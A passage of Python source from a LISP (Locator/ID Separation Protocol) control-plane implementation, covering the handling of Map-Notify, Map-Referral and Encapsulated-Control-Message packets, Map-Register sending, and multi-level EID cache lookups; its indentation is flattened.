lisp_send_map_notify_ack(lisp_sockets, eid_records, map_notify, ms)
#enddef
#
# lisp_process_multicast_map_notify
#
# Have the ITR process receive a multicast Map-Notify message. We will update
# the map-cache with a new RLE for the (S,G) entry. We do not have to
# authenticate the Map-Notify or send a Map-Notify-Ack since the lisp-etr
# process has already done so.
#
def lisp_process_multicast_map_notify(packet, source):
map_notify = lisp_map_notify("")
packet = map_notify.decode(packet)
if (packet == None):
lprint("Could not decode Map-Notify packet")
return
#endif
map_notify.print_notify()
if (map_notify.record_count == 0): return
eid_records = map_notify.eid_records
for i in range(map_notify.record_count):
eid_record = lisp_eid_record()
eid_records = eid_record.decode(eid_records)
if (packet == None): return
eid_record.print_record(" ", False)
#
# Get or create map-cache entry for (S,G).
#
mc = lisp_map_cache_lookup(eid_record.eid, eid_record.group)
if (mc == None):
allow, x, y = lisp_allow_gleaning(eid_record.eid, eid_record.group,
None)
if (allow == False): continue
mc = lisp_mapping(eid_record.eid, eid_record.group, [])
mc.add_cache()
#endif
#
        # Gleaned map-cache entries always override what is registered in
        # the mapping system, since the mapping system RLE entries are RTRs
        # and RTRs store gleaned mappings for group members.
#
if (mc.gleaned):
lprint("Ignore Map-Notify for gleaned {}".format( \
green(mc.print_eid_tuple(), False)))
continue
#endif
mc.mapping_source = None if source == "lisp-etr" else source
mc.map_cache_ttl = eid_record.store_ttl()
#
# If no RLOCs in the Map-Notify and we had RLOCs in the existing
# map-cache entry, remove them.
#
if (len(mc.rloc_set) != 0 and eid_record.rloc_count == 0):
mc.rloc_set = []
mc.build_best_rloc_set()
lisp_write_ipc_map_cache(True, mc)
lprint("Update {} map-cache entry with no RLOC-set".format( \
green(mc.print_eid_tuple(), False)))
continue
#endif
rtr_mc = mc.rtrs_in_rloc_set()
#
# If there are RTRs in the RLOC set for an existing map-cache entry,
# only put RTR RLOCs from the Map-Notify in the map-cache.
#
for j in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
eid_records = rloc_record.decode(eid_records, None)
rloc_record.print_record(" ")
if (eid_record.group.is_null()): continue
if (rloc_record.rle == None): continue
#
# Get copy of stats from old stored record so the display can
# look continuous even though the physical pointer is changing.
#
stats = mc.rloc_set[0].stats if len(mc.rloc_set) != 0 else None
#
# Store in map-cache.
#
rloc = lisp_rloc()
rloc.store_rloc_from_record(rloc_record, None, mc.mapping_source)
if (stats != None): rloc.stats = copy.deepcopy(stats)
if (rtr_mc and rloc.is_rtr() == False): continue
mc.rloc_set = [rloc]
mc.build_best_rloc_set()
lisp_write_ipc_map_cache(True, mc)
lprint("Update {} map-cache entry with RLE {}".format( \
green(mc.print_eid_tuple(), False),
rloc.rle.print_rle(False, True)))
#endfor
#endfor
return
#enddef
#
# lisp_process_map_notify
#
# Process Map-Notify message. All that needs to be done is to validate it with
# the Map-Server that sent it and return a Map-Notify-Ack.
#
def lisp_process_map_notify(lisp_sockets, orig_packet, source):
map_notify = lisp_map_notify("")
packet = map_notify.decode(orig_packet)
if (packet == None):
lprint("Could not decode Map-Notify packet")
return
#endif
map_notify.print_notify()
#
    # Get the map-server so we can do statistics and find the auth-key, if an
    # auth-key was provided in the Map-Notify message.
#
s = source.print_address()
if (map_notify.alg_id != 0 or map_notify.auth_len != 0):
ms = None
for key in lisp_map_servers_list:
if (key.find(s) == -1): continue
ms = lisp_map_servers_list[key]
#endfor
if (ms == None):
lprint((" Could not find Map-Server {} to authenticate " + \
"Map-Notify").format(s))
return
#endif
ms.map_notifies_received += 1
auth_good = lisp_verify_auth(packet, map_notify.alg_id,
map_notify.auth_data, ms.password)
lprint(" Authentication {} for Map-Notify".format("succeeded" if \
auth_good else "failed"))
if (auth_good == False): return
else:
ms = lisp_ms(s, None, "", 0, "", False, False, False, False, 0, 0, 0,
None)
#endif
#
    # Send out Map-Notify-Ack. Skip over packet so lisp_send_map_notify_ack()
    # starts the packet with EID-records.
#
eid_records = map_notify.eid_records
if (map_notify.record_count == 0):
lisp_send_map_notify_ack(lisp_sockets, eid_records, map_notify, ms)
return
#endif
#
# If this is a Map-Notify for an (S,G) entry, send the message to the
# lisp-itr process so it can update its map-cache for an active source
    # in this site. There is probably an RLE change that the ITR needs to know
# about.
#
eid_record = lisp_eid_record()
packet = eid_record.decode(eid_records)
if (packet == None): return
eid_record.print_record(" ", False)
for j in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
packet = rloc_record.decode(packet, None)
if (packet == None):
lprint(" Could not decode RLOC-record in Map-Notify packet")
return
#endif
rloc_record.print_record(" ")
#endfor
#
# Right now, don't do anything with non-multicast EID records.
#
if (eid_record.group.is_null() == False):
#
# Forward to lisp-itr process via the lisp-core process so multicast
# Map-Notify messages are processed by the ITR process.
#
lprint("Send {} Map-Notify IPC message to ITR process".format( \
green(eid_record.print_eid_tuple(), False)))
ipc = lisp_control_packet_ipc(orig_packet, s, "lisp-itr", 0)
lisp_ipc(ipc, lisp_sockets[2], "lisp-core-pkt")
#endif
#
# Send Map-Notify-Ack after processing contents of Map-Notify.
#
lisp_send_map_notify_ack(lisp_sockets, eid_records, map_notify, ms)
return
#enddef
#
# lisp_process_map_notify_ack
#
# Process received Map-Notify-Ack. This causes the Map-Notify to be removed
# from the lisp_map_notify_queue{}.
#
def lisp_process_map_notify_ack(packet, source):
map_notify = lisp_map_notify("")
packet = map_notify.decode(packet)
if (packet == None):
lprint("Could not decode Map-Notify-Ack packet")
return
#endif
map_notify.print_notify()
#
# Get an EID-prefix out of the Map-Notify-Ack so we can find the site
# associated with it.
#
if (map_notify.record_count < 1):
lprint("No EID-prefix found, cannot authenticate Map-Notify-Ack")
return
#endif
eid_record = lisp_eid_record()
if (eid_record.decode(map_notify.eid_records) == None):
lprint("Could not decode EID-record, cannot authenticate " +
"Map-Notify-Ack")
return
    #endif
eid_record.print_record(" ", False)
eid_str = eid_record.print_eid_tuple()
#
# Find site associated with EID-prefix from first record.
#
if (map_notify.alg_id != LISP_NONE_ALG_ID and map_notify.auth_len != 0):
site_eid = lisp_sites_by_eid.lookup_cache(eid_record.eid, True)
if (site_eid == None):
notfound = bold("Site not found", False)
lprint(("{} for EID {}, cannot authenticate Map-Notify-Ack"). \
format(notfound, green(eid_str, False)))
return
#endif
site = site_eid.site
#
# Count it.
#
site.map_notify_acks_received += 1
key_id = map_notify.key_id
if (key_id in site.auth_key):
password = site.auth_key[key_id]
else:
password = ""
#endif
auth_good = lisp_verify_auth(packet, map_notify.alg_id,
map_notify.auth_data, password)
key_id = "key-id {}".format(key_id) if key_id == map_notify.key_id \
else "bad key-id {}".format(map_notify.key_id)
lprint(" Authentication {} for Map-Notify-Ack, {}".format( \
"succeeded" if auth_good else "failed", key_id))
if (auth_good == False): return
#endif
#
# Remove Map-Notify from retransmission queue.
#
if (map_notify.retransmit_timer): map_notify.retransmit_timer.cancel()
etr = source.print_address()
key = map_notify.nonce_key
if (key in lisp_map_notify_queue):
map_notify = lisp_map_notify_queue.pop(key)
if (map_notify.retransmit_timer): map_notify.retransmit_timer.cancel()
lprint("Dequeue Map-Notify from retransmit queue, key is: {}". \
format(key))
else:
lprint("Map-Notify with nonce 0x{} queue entry not found for {}". \
format(map_notify.nonce_key, red(etr, False)))
#endif
return
#enddef
#
# lisp_map_referral_loop
#
# Check to see if the arrived Map-Referral EID-prefix is more-specific than
# the last one we received. If it is not, we are looping.
#
def lisp_map_referral_loop(mr, eid, group, action, s):
if (action not in (LISP_DDT_ACTION_NODE_REFERRAL,
LISP_DDT_ACTION_MS_REFERRAL)): return(False)
if (mr.last_cached_prefix[0] == None): return(False)
#
# Check group first, if any. Then EID-prefix as source if (S,G).
#
loop = False
if (group.is_null() == False):
loop = mr.last_cached_prefix[1].is_more_specific(group)
#endif
if (loop == False):
loop = mr.last_cached_prefix[0].is_more_specific(eid)
#endif
if (loop):
prefix_str = lisp_print_eid_tuple(eid, group)
cached_str = lisp_print_eid_tuple(mr.last_cached_prefix[0],
mr.last_cached_prefix[1])
lprint(("Map-Referral prefix {} from {} is not more-specific " + \
"than cached prefix {}").format(green(prefix_str, False), s,
cached_str))
#endif
return(loop)
#enddef
#
# lisp_process_map_referral
#
# This function processes a Map-Referral message by a Map-Resolver.
#
def lisp_process_map_referral(lisp_sockets, packet, source):
map_referral = lisp_map_referral()
packet = map_referral.decode(packet)
if (packet == None):
lprint("Could not decode Map-Referral packet")
return
#endif
map_referral.print_map_referral()
s = source.print_address()
nonce = map_referral.nonce
#
    # Process each EID record in the Map-Referral message.
#
for i in range(map_referral.record_count):
eid_record = lisp_eid_record()
packet = eid_record.decode(packet)
if (packet == None):
lprint("Could not decode EID-record in Map-Referral packet")
return
#endif
eid_record.print_record(" ", True)
#
# Check if we have an outstanding request for this Map-Referral reply.
#
key = str(nonce)
if (key not in lisp_ddt_map_requestQ):
lprint(("Map-Referral nonce 0x{} from {} not found in " + \
"Map-Request queue, EID-record ignored").format( \
lisp_hex_string(nonce), s))
continue
#endif
mr = lisp_ddt_map_requestQ[key]
if (mr == None):
lprint(("No Map-Request queue entry found for Map-Referral " +
"nonce 0x{} from {}, EID-record ignored").format( \
lisp_hex_string(nonce), s))
continue
#endif
#
        # Check for Map-Referral looping. If there is no loop, cache the EID
# returned from the Map-Referral in the Map-Request queue entry.
#
if (lisp_map_referral_loop(mr, eid_record.eid, eid_record.group,
eid_record.action, s)):
mr.dequeue_map_request()
continue
#endif
mr.last_cached_prefix[0] = eid_record.eid
mr.last_cached_prefix[1] = eid_record.group
#
# Lookup referral in referral-cache.
#
add_or_replace = False
referral = lisp_referral_cache_lookup(eid_record.eid, eid_record.group,
True)
if (referral == None):
add_or_replace = True
referral = lisp_referral()
referral.eid = eid_record.eid
referral.group = eid_record.group
if (eid_record.ddt_incomplete == False): referral.add_cache()
elif (referral.referral_source.not_set()):
lprint("Do not replace static referral entry {}".format( \
green(referral.print_eid_tuple(), False)))
mr.dequeue_map_request()
continue
#endif
action = eid_record.action
referral.referral_source = source
referral.referral_type = action
ttl = eid_record.store_ttl()
referral.referral_ttl = ttl
referral.expires = lisp_set_timestamp(ttl)
#
# Mark locator up if the Map-Referral source is in the referral-set.
#
negative = referral.is_referral_negative()
if (s in referral.referral_set):
ref_node = referral.referral_set[s]
if (ref_node.updown == False and negative == False):
ref_node.updown = True
lprint("Change up/down status for referral-node {} to up". \
format(s))
elif (ref_node.updown == True and negative == True):
ref_node.updown = False
lprint(("Change up/down status for referral-node {} " + \
"to down, received negative referral").format(s))
#endif
#endif
#
        # Set dirty-bit so we can remove referral-nodes from the cached entry
        # that weren't in the packet.
#
dirty_set = {}
for key in referral.referral_set: dirty_set[key] = None
#
# Process each referral RLOC-record in EID record.
#
for i in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
packet = rloc_record.decode(packet, None)
if (packet == None):
lprint("Could not decode RLOC-record in Map-Referral packet")
return
#endif
rloc_record.print_record(" ")
#
# Copy over existing referral-node
#
addr_str = rloc_record.rloc.print_address()
if (addr_str not in referral.referral_set):
ref_node = lisp_referral_node()
ref_node.referral_address.copy_address(rloc_record.rloc)
referral.referral_set[addr_str] = ref_node
if (s == addr_str and negative): ref_node.updown = False
else:
ref_node = referral.referral_set[addr_str]
if (addr_str in dirty_set): dirty_set.pop(addr_str)
#endif
ref_node.priority = rloc_record.priority
ref_node.weight = rloc_record.weight
#endfor
#
# Now remove dirty referral-node entries.
#
for key in dirty_set: referral.referral_set.pop(key)
eid_str = referral.print_eid_tuple()
if (add_or_replace):
if (eid_record.ddt_incomplete):
lprint("Suppress add {} to referral-cache".format( \
green(eid_str, False)))
else:
lprint("Add {}, referral-count {} to referral-cache".format( \
green(eid_str, False), eid_record.rloc_count))
#endif
else:
lprint("Replace {}, referral-count: {} in referral-cache".format( \
green(eid_str, False), eid_record.rloc_count))
#endif
#
# Process actions.
#
if (action == LISP_DDT_ACTION_DELEGATION_HOLE):
lisp_send_negative_map_reply(mr.lisp_sockets, referral.eid,
referral.group, mr.nonce, mr.itr, mr.sport, 15, None, False)
mr.dequeue_map_request()
#endif
if (action == LISP_DDT_ACTION_NOT_AUTH):
if (mr.tried_root):
lisp_send_negative_map_reply(mr.lisp_sockets, referral.eid,
referral.group, mr.nonce, mr.itr, mr.sport, 0, None, False)
mr.dequeue_map_request()
else:
lisp_send_ddt_map_request(mr, True)
#endif
#endif
if (action == LISP_DDT_ACTION_MS_NOT_REG):
if (s in referral.referral_set):
ref_node = referral.referral_set[s]
ref_node.updown = False
#endif
if (len(referral.referral_set) == 0):
mr.dequeue_map_request()
else:
lisp_send_ddt_map_request(mr, False)
#endif
#endif
if (action in (LISP_DDT_ACTION_NODE_REFERRAL,
LISP_DDT_ACTION_MS_REFERRAL)):
if (mr.eid.is_exact_match(eid_record.eid)):
if (not mr.tried_root):
lisp_send_ddt_map_request(mr, True)
else:
lisp_send_negative_map_reply(mr.lisp_sockets,
referral.eid, referral.group, mr.nonce, mr.itr,
mr.sport, 15, None, False)
mr.dequeue_map_request()
#endif
else:
lisp_send_ddt_map_request(mr, False)
#endif
#endif
if (action == LISP_DDT_ACTION_MS_ACK): mr.dequeue_map_request()
#endfor
return
#enddef
#
# lisp_process_ecm
#
# Process a received Encapsulated-Control-Message. It is assumed for right now
# that all ECMs have a Map-Request embedded.
#
def lisp_process_ecm(lisp_sockets, packet, source, ecm_port):
ecm = lisp_ecm(0)
packet = ecm.decode(packet)
if (packet == None):
lprint("Could not decode ECM packet")
return
#endif
ecm.print_ecm()
header = lisp_control_header()
if (header.decode(packet) == None):
lprint("Could not decode control header")
return
#endif
packet_type = header.type
del(header)
if (packet_type != LISP_MAP_REQUEST):
lprint("Received ECM without Map-Request inside")
return
#endif
#
# Process Map-Request.
#
mr_port = ecm.udp_sport
timestamp = time.time()
lisp_process_map_request(lisp_sockets, packet, source, ecm_port,
ecm.source, mr_port, ecm.ddt, -1, timestamp)
return
#enddef
#------------------------------------------------------------------------------
#
# lisp_send_map_register
#
# Compute authentication for the Map-Register message and send it to the
# supplied Map-Server.
#
def lisp_send_map_register(lisp_sockets, packet, map_register, ms):
#
    # If we are doing LISP-Decent and have a multicast group configured as
    # a Map-Server, we can't join the group by sending to the group itself,
    # so we have to send to the loopback address to bootstrap our membership.
    # We join via one other member of the peer-group so we can learn the
    # group membership.
#
dest = ms.map_server
if (lisp_decent_push_configured and dest.is_multicast_address() and
(ms.map_registers_multicast_sent == 1 or ms.map_registers_sent == 1)):
dest = copy.deepcopy(dest)
dest.address = 0x7f000001
b = bold("Bootstrap", False)
g = ms.map_server.print_address_no_iid()
lprint("{} mapping system for peer-group {}".format(b, g))
#endif
#
# Modify authentication hash in Map-Register message if supplied when
# lisp_map_register() was called.
#
packet = lisp_compute_auth(packet, map_register, ms.password)
#
    # Should we encrypt the Map-Register? Use a 16-byte key, which is
    # 32 string characters. Use 20 rounds so the decrypter can interoperate
    # with ct-lisp mobile platforms.
#
if (ms.ekey != None):
ekey = ms.ekey.zfill(32)
iv = "0" * 8
ciphertext = chacha.ChaCha(ekey, iv, 20).encrypt(packet[4::])
packet = packet[0:4] + ciphertext
e = bold("Encrypt", False)
lprint("{} Map-Register with key-id {}".format(e, ms.ekey_id))
#endif
decent = ""
if (lisp_decent_pull_xtr_configured()):
decent = ", decent-index {}".format(bold(ms.dns_name, False))
#endif
lprint("Send Map-Register to map-server {}{}{}".format( \
dest.print_address(), ", ms-name '{}'".format(ms.ms_name), decent))
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
return
#enddef
#
# lisp_send_ipc_to_core
#
# Send a LISP control packet that is to be sourced from UDP port 4342 to the
# lisp-core process.
#
def lisp_send_ipc_to_core(lisp_socket, packet, dest, port):
source = lisp_socket.getsockname()
dest = dest.print_address_no_iid()
lprint("Send IPC {} bytes to {} {}, control-packet: {}".format( \
len(packet), dest, port, lisp_format_packet(packet)))
packet = lisp_control_packet_ipc(packet, source, dest, port)
lisp_ipc(packet, lisp_socket, "lisp-core-pkt")
return
#enddef
#
# lisp_send_map_reply
#
# Send Map-Reply message to supplied destination. Note the destination must
# be routable in RLOC space.
#
def lisp_send_map_reply(lisp_sockets, packet, dest, port):
lprint("Send Map-Reply to {}".format(dest.print_address_no_iid()))
lisp_send_ipc_to_core(lisp_sockets[2], packet, dest, port)
return
#enddef
#
# lisp_send_map_referral
#
# Send Map-Referral message to supplied destination. Note the destination must
# be routable in RLOC space.
#
def lisp_send_map_referral(lisp_sockets, packet, dest, port):
lprint("Send Map-Referral to {}".format(dest.print_address()))
lisp_send_ipc_to_core(lisp_sockets[2], packet, dest, port)
return
#enddef
#
# lisp_send_map_notify
#
# Send Map-Notify message to supplied destination. Note the destination must
# be routable in RLOC space.
#
def lisp_send_map_notify(lisp_sockets, packet, dest, port):
lprint("Send Map-Notify to xTR {}".format(dest.print_address()))
lisp_send_ipc_to_core(lisp_sockets[2], packet, dest, port)
return
#enddef
#
# lisp_send_ecm
#
# Send Encapsulated Control Message.
#
def lisp_send_ecm(lisp_sockets, packet, inner_source, inner_sport, inner_dest,
outer_dest, to_etr=False, to_ms=False, ddt=False):
if (inner_source == None or inner_source.is_null()):
inner_source = inner_dest
#endif
#
    # For sending Map-Requests, if NAT-traversal is configured, use the same
    # socket that was used to send the Info-Request.
#
if (lisp_nat_traversal):
sport = lisp_get_any_translated_port()
if (sport != None): inner_sport = sport
#endif
ecm = lisp_ecm(inner_sport)
ecm.to_etr = to_etr if lisp_is_running("lisp-etr") else False
ecm.to_ms = to_ms if lisp_is_running("lisp-ms") else False
ecm.ddt = ddt
ecm_packet = ecm.encode(packet, inner_source, inner_dest)
if (ecm_packet == None):
lprint("Could not encode ECM message")
return
#endif
ecm.print_ecm()
packet = ecm_packet + packet
addr_str = outer_dest.print_address_no_iid()
lprint("Send Encapsulated-Control-Message to {}".format(addr_str))
dest = lisp_convert_4to6(addr_str)
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
return
#enddef
#------------------------------------------------------------------------------
#
# Below are constant definitions used for internal data structures.
#
LISP_AFI_GEO_COORD = -3
LISP_AFI_IID_RANGE = -2
LISP_AFI_ULTIMATE_ROOT = -1
LISP_AFI_NONE = 0
LISP_AFI_IPV4 = 1
LISP_AFI_IPV6 = 2
LISP_AFI_MAC = 6
LISP_AFI_E164 = 8
LISP_AFI_NAME = 17
LISP_AFI_LCAF = 16387
LISP_RLOC_UNKNOWN_STATE = 0
LISP_RLOC_UP_STATE = 1
LISP_RLOC_DOWN_STATE = 2
LISP_RLOC_UNREACH_STATE = 3
LISP_RLOC_NO_ECHOED_NONCE_STATE = 4
LISP_RLOC_ADMIN_DOWN_STATE = 5
LISP_AUTH_NONE = 0
LISP_AUTH_MD5 = 1
LISP_AUTH_SHA1 = 2
LISP_AUTH_SHA2 = 3
#------------------------------------------------------------------------------
#
# This is a general address format for EIDs, RLOCs, EID-prefixes in any AFI or
# LCAF format.
#
LISP_IPV4_HOST_MASK_LEN = 32
LISP_IPV6_HOST_MASK_LEN = 128
LISP_MAC_HOST_MASK_LEN = 48
LISP_E164_HOST_MASK_LEN = 60
#
# byte_swap_64
#
# Byte-swap a 64-bit number.
#
def byte_swap_64(address):
addr = \
((address & 0x00000000000000ff) << 56) | \
((address & 0x000000000000ff00) << 40) | \
((address & 0x0000000000ff0000) << 24) | \
((address & 0x00000000ff000000) << 8) | \
((address & 0x000000ff00000000) >> 8) | \
((address & 0x0000ff0000000000) >> 24) | \
((address & 0x00ff000000000000) >> 40) | \
((address & 0xff00000000000000) >> 56)
return(addr)
#enddef
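#
# A hedged illustration (not used by the code itself): byte_swap_64()
# reverses the byte order of a 64-bit quantity, for example:
#
#   byte_swap_64(0x0102030405060708) -> 0x0807060504030201
#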
#
# lisp_cache is a data structure to implement a multi-way tree. The first
# level array is an associative array of mask-lengths. Then each mask-length
# entry will be an associative array of the following key:
#
# <32-bit-instance-id> <16-bit-address-family> <eid-prefix>
#
# Data structure:
# self.cache{}
# self.cache_sorted[]
# self.cache{}.entries{}
# self.cache{}.entries_sorted[]
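#
# As a hedged illustration of the key layout (derived from build_key() below;
# the values are examples only): EID-prefix [1000]10.0.0.0/8 is stored under
# mask-length 8 + 48 = 56 with key "000003e8" + "0001" + "0a000000", that is,
# instance-id, AFI, then address, each as zero-filled hex.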
#
class lisp_cache_entries(object):
def __init__(self):
self.entries = {}
self.entries_sorted = []
#enddef
#endclass
class lisp_cache(object):
def __init__(self):
self.cache = {}
self.cache_sorted = []
self.cache_count = 0
#enddef
def cache_size(self):
return(self.cache_count)
#enddef
def build_key(self, prefix):
if (prefix.afi == LISP_AFI_ULTIMATE_ROOT):
ml = 0
elif (prefix.afi == LISP_AFI_IID_RANGE):
ml = prefix.mask_len
else:
ml = prefix.mask_len + 48
#endif
iid = lisp_hex_string(prefix.instance_id).zfill(8)
afi = lisp_hex_string(prefix.afi).zfill(4)
if (prefix.afi > 0):
if (prefix.is_binary()):
length = prefix.addr_length() * 2
addr = lisp_hex_string(prefix.address).zfill(length)
else:
addr = prefix.address
#endif
elif (prefix.afi == LISP_AFI_GEO_COORD):
afi = "8003"
addr = prefix.address.print_geo()
else:
afi = ""
addr = ""
#endif
key = iid + afi + addr
return([ml, key])
#enddef
def add_cache(self, prefix, entry):
if (prefix.is_binary()): prefix.zero_host_bits()
ml, key = self.build_key(prefix)
if (ml not in self.cache):
self.cache[ml] = lisp_cache_entries()
self.cache_sorted = self.sort_in_entry(self.cache_sorted, ml)
#endif
if (key not in self.cache[ml].entries):
self.cache_count += 1
#endif
self.cache[ml].entries[key] = entry
#enddef
def lookup_cache(self, prefix, exact):
ml_key, key = self.build_key(prefix)
if (exact):
if (ml_key not in self.cache): return(None)
if (key not in self.cache[ml_key].entries): return(None)
return(self.cache[ml_key].entries[key])
#endif
found = None
for ml in self.cache_sorted:
if (ml_key < ml): return(found)
for entry in list(self.cache[ml].entries.values()):
if (prefix.is_more_specific(entry.eid)):
if (found == None or
entry.eid.is_more_specific(found.eid)): found = entry
#endif
#endfor
#endfor
return(found)
#enddef
def delete_cache(self, prefix):
ml, key = self.build_key(prefix)
if (ml not in self.cache): return
if (key not in self.cache[ml].entries): return
self.cache[ml].entries.pop(key)
self.cache_count -= 1
#enddef
def walk_cache(self, function, parms):
for ml in self.cache_sorted:
for entry in list(self.cache[ml].entries.values()):
status, parms = function(entry, parms)
if (status == False): return(parms)
#endfor
#endfor
return(parms)
#enddef
def sort_in_entry(self, table, value):
if (table == []): return([value])
t = table
while (True):
if (len(t) == 1):
if (value == t[0]): return(table)
index = table.index(t[0])
if (value < t[0]):
return(table[0:index] + [value] + table[index::])
#endif
if (value > t[0]):
return(table[0:index+1] + [value] + table[index+1::])
#endif
#endif
index = old_div(len(t), 2)
t = t[0:index] if (value < t[index]) else t[index::]
#endwhile
return([])
#enddef
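    #
    # A hedged illustration of sort_in_entry() (values are examples only): it
    # does a sorted insert with no duplicates, so inserting 24 into [8, 16, 32]
    # returns [8, 16, 24, 32], and inserting 16 again returns the list
    # unchanged.
    #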
def print_cache(self):
lprint("Printing contents of {}: ".format(self))
if (self.cache_size() == 0):
lprint(" Cache is empty")
return
#endif
for ml in self.cache_sorted:
for key in self.cache[ml].entries:
entry = self.cache[ml].entries[key]
lprint(" Mask-length: {}, key: {}, entry: {}".format(ml, key,
entry))
#endfor
#endfor
#enddef
#endclass
#
# Caches.
#
lisp_referral_cache = lisp_cache()
lisp_ddt_cache = lisp_cache()
lisp_sites_by_eid = lisp_cache()
lisp_map_cache = lisp_cache()
lisp_db_for_lookups = lisp_cache() # Elements are class lisp_mapping()
#
# lisp_map_cache_lookup
#
# Do hierarchical lookup in the lisp_map_cache lisp_cache(). This is used
# by the ITR and RTR data-planes.
#
def lisp_map_cache_lookup(source, dest):
multicast = dest.is_multicast_address()
#
# Look up destination in map-cache.
#
mc = lisp_map_cache.lookup_cache(dest, False)
if (mc == None):
eid_str = source.print_sg(dest) if multicast else dest.print_address()
eid_str = green(eid_str, False)
dprint("Lookup for EID {} not found in map-cache".format(eid_str))
return(None)
#endif
#
# Unicast lookup succeeded.
#
if (multicast == False):
m = green(mc.eid.print_prefix(), False)
dprint("Lookup for EID {} found map-cache entry {}".format( \
green(dest.print_address(), False), m))
return(mc)
#endif
#
# If destination is multicast, then do source lookup.
#
mc = mc.lookup_source_cache(source, False)
if (mc == None):
eid_str = source.print_sg(dest)
dprint("Lookup for EID {} not found in map-cache".format(eid_str))
return(None)
#endif
#
# Multicast lookup succeeded.
#
m = green(mc.print_eid_tuple(), False)
dprint("Lookup for EID {} found map-cache entry {}".format( \
green(source.print_sg(dest), False), m))
return(mc)
#enddef
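#
# A hedged usage sketch (the addresses and instance-ID below are illustrative
# only):
#
#   s = lisp_address(LISP_AFI_IPV4, "10.1.1.1", 32, 1000)
#   d = lisp_address(LISP_AFI_IPV4, "10.2.2.2", 32, 1000)
#   mc = lisp_map_cache_lookup(s, d)
#
# For a unicast destination only 'd' is looked up; for a multicast 'd' the
# source 's' is then looked up inside the matched (S,G) entry, and a
# group-only match is not returned.
#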
#
# lisp_referral_cache_lookup
#
# Do hierarchical lookup in the lisp_referral_cache lisp_cache().
#
def lisp_referral_cache_lookup(eid, group, exact):
if (group and group.is_null()):
ref = lisp_referral_cache.lookup_cache(eid, exact)
return(ref)
#endif
#
# No source to do 2-stage lookup, return None.
#
if (eid == None or eid.is_null()): return(None)
#
# Do 2-stage lookup, first on group and within its structure for source.
# If we found both entries, return source entry. If we didn't find source
# entry, then return group entry if longest match requested.
#
ref = lisp_referral_cache.lookup_cache(group, exact)
if (ref == None): return(None)
sref = ref.lookup_source_cache(eid, exact)
if (sref): return(sref)
if (exact): ref = None
return(ref)
#enddef
#
# lisp_ddt_cache_lookup
#
# Do hierarchical lookup in the lisp_ddt_cache lisp_cache().
#
def lisp_ddt_cache_lookup(eid, group, exact):
if (group.is_null()):
ddt = lisp_ddt_cache.lookup_cache(eid, exact)
return(ddt)
#endif
#
# No source to do 2-stage lookup, return None.
#
if (eid.is_null()): return(None)
#
# Do 2-stage lookup, first on group and within its structure for source.
# If we found both entries, return source entry. If we didn't find source
# entry, then return group entry if longest match requested.
#
ddt = lisp_ddt_cache.lookup_cache(group, exact)
if (ddt == None): return(None)
sddt = ddt.lookup_source_cache(eid, exact)
if (sddt): return(sddt)
if (exact): ddt = None
return(ddt)
#enddef
#
# lisp_site_eid_lookup
#
# Do hierarchical lookup in the lisp_sites_by_eid lisp_cache().
#
def lisp_site_eid_lookup(eid, group, exact):
if (group.is_null()):
site_eid = lisp_sites_by_eid.lookup_cache(eid, exact)
return(site_eid)
#endif
#
# No source to do 2-stage lookup, return None.
#
if (eid.is_null()): return(None)
#
# Do 2-stage lookup, first on group and within its structure for source.
# If we found both entries, return source entry. If we didn't find source
# entry, then return group entry if longest match requested.
#
site_eid = lisp_sites_by_eid.lookup_cache(group, exact)
if (site_eid == None): return(None)
#
# There is a special case we have to deal with here. If there exists a
# (0.0.0.0/0, 224.0.0.0/4) entry that has been configured with accept-
    # more-specifics, this entry will not be returned if there is a more-
# specific already cached. For instance, if a Map-Register was received
# for (1.1.1.1/32, 224.1.1.1/32), it will match the (0.0.0.0/0,
# 224.0.0.0/4) entry. But when (1.1.1.1/32, 224.1.1.1/32) is cached and
# a Map-Register is received for (2.2.2.2/32, 224.1.1.1/32), rather than
# matching the ams entry, it will match the more specific entry and return
# (*, 224.1.1.1/32). Since the source lookup will be performed below and
    # not find 2.2.2.2, what is returned is 224.1.1.1/32 and not 224.0.0.0/4.
#
    # So we will look at the returned entry and if a source is not found, we
# will check to see if the parent of the 224.1.1.1/32 matches the group
# we are looking up. This, of course, is only done for longest match
# lookups.
#
seid = site_eid.lookup_source_cache(eid, exact)
if (seid): return(seid)
if (exact):
site_eid = None
else:
parent = site_eid.parent_for_more_specifics
if (parent and parent.accept_more_specifics):
if (group.is_more_specific(parent.group)): site_eid = parent
#endif
#endif
return(site_eid)
#enddef
#
# LISP Address encodings. Both in AFI formats and LCAF formats.
#
# Here is an EID encoded in:
#
# Instance ID LISP Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 2 | IID mask-len | 4 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Instance ID |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# There is a Python peculiarity with shifting greater than 120 bits to the
# left. If the high-order bit hits bit 127, then it shifts it another 8 bits.
# This causes IPv6 addresses to lose their high-order byte. So note the check
# for shift >= 120 below.
#
class lisp_address(object):
def __init__(self, afi, addr_str, mask_len, iid):
self.afi = afi
self.mask_len = mask_len
self.instance_id = iid
self.iid_list = []
self.address = 0
if (addr_str != ""): self.store_address(addr_str)
#enddef
def copy_address(self, addr):
if (addr == None): return
self.afi = addr.afi
self.address = addr.address
self.mask_len = addr.mask_len
self.instance_id = addr.instance_id
self.iid_list = addr.iid_list
#enddef
def make_default_route(self, addr):
self.afi = addr.afi
self.instance_id = addr.instance_id
self.mask_len = 0
self.address = 0
#enddef
def make_default_multicast_route(self, addr):
self.afi = addr.afi
